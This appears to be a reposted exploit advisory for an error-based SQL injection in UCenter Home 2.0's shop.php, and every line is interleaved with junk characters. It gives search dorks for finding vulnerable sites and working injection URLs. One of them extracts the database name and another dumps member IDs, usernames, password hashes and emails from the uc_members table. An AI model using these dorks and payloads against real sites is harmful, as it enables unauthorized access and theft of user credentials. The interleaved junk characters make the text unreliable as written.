! Q& s ?, w7 D2 ^" N__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 2 q8 d3 r, |6 ?# D7 |. O8 q- Y+ u, u
- D! V# X9 o7 _" O% |
2 q. ~$ g" R/ Q2 q) T, I# q& Y; D) z+ `! U" `1 q, o
*/ Author : KnocKout 5 ?, b" h% k, \6 m/ u& l% h( K9 F
% {' L2 u( @8 e2 S7 b: b*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ! q) @ R/ o. \6 ^1 I) S
$ `# \& u) Q1 Y. h! ? @& z; k! o9 @& j
*/ Contact: knockoutr@msn.com ( ~ D2 h% ~# g$ ~; M
|! C! j8 V4 A*/ Cyber-Warrior.org/CWKnocKout 9 h* ~3 w k& M! Q2 A
9 y4 g* E9 [: ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( z a v1 Y! \6 ?0 J$ k
+ G, h- L; x. d: d- i" Y6 E+ tScript : UCenter Home
1 q* C4 C2 J% W" E2 M7 C } f" g2 g6 k6 D* W( b! L# ~' Q! D
Version : 2.0
+ _4 I5 T3 K, ~$ t. J7 U/ m1 _3 O6 }/ Z: g3 ]- o& }: `4 e
Script HomePage : http://u.discuz.net/
) j3 Z6 l6 o2 P) Q6 e
' [( x& W( F5 J5 C# H__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) e1 u% W- N( o V7 W" c' I
# v* ?$ H. _" F+ Z( M6 ]Dork : Powered by UCenter inurl:shop.php?ac=view 4 d3 D1 q2 K+ g! V
+ e' g$ d5 w- f+ G! mDork 2 : inurl:shop.php?ac=view&shopid= $ _1 e4 k/ _- [$ P/ z0 U8 H; \; q, ~
' j3 C, h4 f' G& f! J( ___--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ' w: D& ~8 X, Y4 Z8 \* r- N* B/ o; }# @
_: ^! W T1 t! d: ] ~# {
Vuln file : Shop.php % r/ |; x4 G& k5 k& K
- c \* q' K% ^3 q1 i; t
value's : (?)ac=view&shopid=
5 a7 n- f$ {0 S
, S# o* N5 a4 `* ?6 ~/ [, `9 r) lVulnerable Style : SQL Injection (MySQL Error Based)
2 w7 h! b" V! V$ Z1 \! D" U9 n% \/ y& B3 @! U1 J7 z
Need Metarials : Hex Conversion 3 d8 `& l% `2 Q, g& j
: p7 _1 X" j! V__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' M2 h- U0 m" L- D2 ?
1 _" M; I9 \) d0 x: c7 G# H$ tYour Need victim Database name.
. v9 Q+ w5 V1 t4 m9 F
# h4 t# a& U; }# V+ R$ I4 Z1 _5 nfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1 i2 @7 }! e" v( m$ D& Y3 g4 c ?5 K/ ^+ o/ t
.. + N. _* p/ D' u, Z0 B
/ J$ x1 [( P# m8 d8 @9 I
DB : Okey. * |: T; s% Y: s" L! ?3 a- H
& t5 H- a% a5 Q) m$ {
your edit DB `[TARGET DB NAME]`
2 n5 O' Z! v' }3 w" ~
( C: f$ u* W9 p/ v2 cExample : 'hiwir1_ucenter'
! t( x" T: x# Q9 s( X8 N: h6 d" h
) [* T6 I: b" ^- J" a/ Z4 {Edit : Okey.
: x1 a4 H1 N. Q( w* X) Z' O: y6 i X
/ z5 G9 h4 I% i qYour use Hex conversion. And edit Your SQL Injection Exploit..
5 K2 r, p) [+ C# I
4 |/ Z* r6 F/ {; G: X' ` / K" f( a3 o2 z' e9 d% \+ k2 @
7 `( V: e; Z1 z" `0 U( ^! yExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 6 W$ Y- Y% G: _( \( A
|
发表于 2013-2-27 21:31:31
收藏
支持
反对